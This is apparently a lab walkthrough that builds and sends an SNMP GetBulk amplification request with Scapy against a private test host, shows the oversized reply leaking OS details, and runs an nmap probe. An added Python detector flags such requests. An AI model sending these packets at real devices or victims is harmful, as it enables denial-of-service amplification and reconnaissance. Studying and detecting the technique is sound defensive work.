SNMP Amplification Attack
Building the packets with Scapy
Define the IP packet
>>> i=IP()
>>> i.dst="192.168.180.134"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= hopopt
chksum= None
src= 192.168.180.131
dst= 192.168.180.134
\options\
---------------------------------------------------------
Define the UDP packet
>>> u=UDP()
>>> u.dport=161
>>> u.sport=161
>>> u.display()
###[ UDP ]###
sport= snmp
dport= snmp
len= None
chksum= None
----------------------------------------------------------
Define the SNMP packet
>>> s=SNMP()
>>> s.community="public"
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPget ]###
| id= 0x0 <ASN1_INTEGER[0]>
| error= 'no_error' 0x0 <ASN1_INTEGER[0]>
| error_index= 0x0 <ASN1_INTEGER[0]>
| \varbindlist\
----------------------------------------------------------
Define the SNMP bulk PDU
b=SNMPbulk()
b.display()
b.max_repetitions = 200
s.PDU=b
b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
s.display()
r=(i/u/s)
r.display()
sr1(r)
>>> b=SNMPbulk()
>>> b.display()
###[ SNMPbulk ]###
id= 0x0 <ASN1_INTEGER[0]>
non_repeaters= 0x0 <ASN1_INTEGER[0]>
max_repetitions= 0x0 <ASN1_INTEGER[0]>
\varbindlist\
>>> b.max_repetitions=200
>>> b.display()
###[ SNMPbulk ]###
id= 0x0 <ASN1_INTEGER[0]>
non_repeaters= 0x0 <ASN1_INTEGER[0]>
max_repetitions= 200
\varbindlist\
>>> s.PDU=b
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
| | value= <ASN1_NULL[0]>
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
| | value= <ASN1_NULL[0]>
>>> r=(i/u/s)
>>> r.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= udp
chksum= None
src= 192.168.180.131
dst= 192.168.180.134
\options\
###[ UDP ]###
sport= snmp
dport= snmp
len= None
chksum= None
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
| | value= <ASN1_NULL[0]>
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
| | value= <ASN1_NULL[0]>
------------------------------------------------------------
Send the SNMP packet
>>> sr1(r)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x0 len=1500 id=360 flags=MF frag=0 ttl=128 proto=udp chksum=0x294e src=192.168.180.134 dst=192.168.180.131 |<UDP sport=snmp dport=snmp len=8915 chksum=0xa39d |<Raw load='0\x82"\xc7\x02\x01\x01\x04\x06public\xa2\x82"\xb8\x02\x01\x00\x02\x01\x00\x02\x01\x000\x82"\xab0\x81\x8a\x06\x08+\x06\x01\x02\x01\x01\x01\x00\x04~Hardware: x86 Family 6 Model 158 Stepping 13 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)0\x10\x06\ .........
Probing
nmap -sU -p161 192.168.180.134
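On the monitoring side, the request built above has two recognisable traits: the default community string public and a GetBulk max_repetitions of 200. The following added example (not part of the original page) decodes a UDP/161 payload in plain Python and flags such requests; the threshold of 50 repetitions, the function names and both byte samples are assumptions constructed for illustration.

```python
# Added example (not from the original page): flag SNMPv2c GetBulk requests
# whose max-repetitions is large enough to act as an amplification trigger.
GETBULK_TAG = 0xA5            # context tag [5]: GetBulkRequest-PDU (RFC 3416)
DEFAULT_COMMUNITIES = {b"public", b"private"}
MAX_REPETITIONS_LIMIT = 50    # assumed site threshold; tune to your NMS

def read_tlv(buf, pos):
    """Decode one BER TLV at pos and return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:         # long form: low 7 bits give the count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def inspect_snmp(payload):
    """Parse a UDP/161 payload; return findings, or None if it is not community-based SNMP."""
    try:
        tag, msg, _ = read_tlv(payload, 0)
        vt, version, p = read_tlv(msg, 0)
        ct, community, p = read_tlv(msg, p)
        if tag != 0x30 or vt != 0x02 or ct != 0x04:   # SEQUENCE, INTEGER, OCTET STRING
            return None
        pdu_tag, pdu, _ = read_tlv(msg, p)
        max_rep = None
        if pdu_tag == GETBULK_TAG:
            _, _, q = read_tlv(pdu, 0)                # request-id
            _, _, q = read_tlv(pdu, q)                # non-repeaters
            _, raw, _ = read_tlv(pdu, q)              # max-repetitions
            max_rep = int.from_bytes(raw, "big", signed=True)
    except (IndexError, ValueError):
        return None
    reasons = []
    if community in DEFAULT_COMMUNITIES:
        reasons.append("default community string")
    flagged = max_rep is not None and max_rep > MAX_REPETITIONS_LIMIT
    if flagged:
        reasons.append(f"GetBulk max-repetitions={max_rep}")
    return {"version": int.from_bytes(version, "big"), "community": community,
            "max_repetitions": max_rep, "reasons": reasons, "suspicious": flagged}

# Constructed samples: the GetBulk request built on this page, and an ordinary Get.
SAMPLE_GETBULK = bytes.fromhex("303302010104067075626c6963a526020100020100020200c8301a"
                               "300a06062b06010201010500300c06082b060102011301030500")
SAMPLE_GET = bytes.fromhex("302602010104066e30632d726fa019"
                           "020101020100020100300e300c06082b060102010101000500")
```

Feed inspect_snmp the UDP payload of packets addressed to port 161 from a capture or sensor; a non-empty reasons list on traffic from outside the management network is worth an alert.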